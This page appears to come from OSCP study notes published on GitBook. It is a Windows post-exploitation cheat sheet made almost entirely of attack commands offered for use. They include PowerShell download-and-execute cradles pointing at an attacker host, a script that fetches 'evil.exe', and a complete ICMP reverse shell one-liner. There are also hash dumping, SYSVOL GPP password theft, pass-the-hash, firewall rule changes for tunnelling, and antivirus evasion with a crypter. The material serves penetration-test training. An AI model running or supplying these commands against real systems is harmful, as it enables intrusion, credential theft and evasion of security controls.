🌇
oscp
  • Introduction
  • Chapter 1 - Cheatsheets
  • Chapter 2 - Recon & Enumeration
  • Chapter 3 - Exploiting Vulnerabilities
  • Chapter 4 - Windows Post-Exploitation
  • Chapter 5 - Linux Post-Exploitation
  • Chapter 6 - Exploit Development
  • Chapter 7 - Cracking
  • Chapter 8 - Reverse Engineering
  • Chapter 9 - Miscellaneous
Powered by GitBook
On this page
  • Resources
  • Cross Compiling from Kali
  • Transpile Python into EXE
  • Uploading Files
  • Security Stuff
  • AZURE
  • Powershell Foo
  • Services
  • LDAP
  • Kerberos
  • Dump Hashes
  • WCE
  • PSExec
  • UAC
  • WMIC
  • Insecure File Permissions
  • Insecure SYSVOL
  • RDP
  • DLL Injection
  • NTLM/v2
  • Token Stealing
  • Passing the Hash
  • runas
  • Encapsulating SSH Traffic with httptunnel

Was this helpful?

Chapter 4 - Windows Post-Exploitation

PreviousChapter 3 - Exploiting VulnerabilitiesNextChapter 5 - Linux Post-Exploitation

Last updated 4 years ago

Was this helpful?

Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.”

— Indiana University (Best practices for computer security)

This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.

Resources

Cross Compiling from Kali

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c

Transpile Python into EXE

Kali> python pyinstaller.py --onefile file.py

Uploading Files

Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt

Security Stuff

AZURE

Powershell Foo

Resources

Download File

C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
Kali> echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10:8000/')" | iconv -t utf-16le

wget

echo $storageDir = $pwd > wget.ps1   
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1    
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo  ‐NonInteractive  ‐NoProfile ‐File wget.ps1

Execute ps1

C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1

Stream contents of file

C:\> Get-Item /path/to/file.zip -Stream *

Get permissions of directory/file

C:\> Get-ACL C:\path\to\file\or\directory

Packet testing

# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie")$client.Send($packet, $packet.Length);$client.Close();'

# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'

# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'

Reverse ICMP shell

Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET

C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"

Services

LDAP

Kerberos

Dump Hashes

C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

WCE

C:\> wce -w

PSExec

You need to be an admin already it copies an executable to an admin share and registers a service and starts it

UAC

WMIC

Insecure File Permissions

C:\> icacls example.exe

Insecure SYSVOL

C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt

RDP

DLL Injection

NTLM/v2

Token Stealing

Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.

Passing the Hash

Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

runas

Encapsulating SSH Traffic with httptunnel

# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe

Note: If the above does not work you might need to convert it into utf-16 little endian because this is what the Windows OS expects. More here:

Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks At is the new Black - YouTube
Well, that escalated quickly
Analyizing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Exploitation Techniques and Mitigations on Windows
Windows Exploitation
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
LSA Authentication - MSDN
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows 8 ASLR Internals
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
NetView
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
Compromise as a Service: our pleAZURE
Attacking ADFS Endpoints with PowerShell
PowerShell AD Recon
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
PowerShell Unicorn
Sherlock for Powershell
UTF-16 is used internally by systems such as Microsoft Windows
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
5 Ways to find Systems running domain admin processes
I hunt SysAdmins part 1
I hunt SysAdmins part 2
PenTesting Active Directory Environments: CrapMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domains worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
The Secret Life of Krbtgt
Kerberos Golden Ticket Protection
Kerberos Golden Ticket Final
Et Tu Kerberos
Abusing Microsoft Kerberos
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
SysInternals PSExec - TechNet
PUPY
WinEXE
PSExec Pass the Hash
Lateral Movement with Invoke-PsExec
UACME
Anatomy of UAC Attacks - FuzzySecurity
WMIExec.py
Elevating privileges by exploiting weak folder permissions
RDP Hijacking: How to hijack RDS and RemoteApp sessions transparently to move through an organization
Windows DLL Injection Basics
Portable Execution Injection
Automated DLL Enumeration
Automated DLL Injection
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Pass the Hash toolkit
Invoke-Runas
Runas Reference
SigThief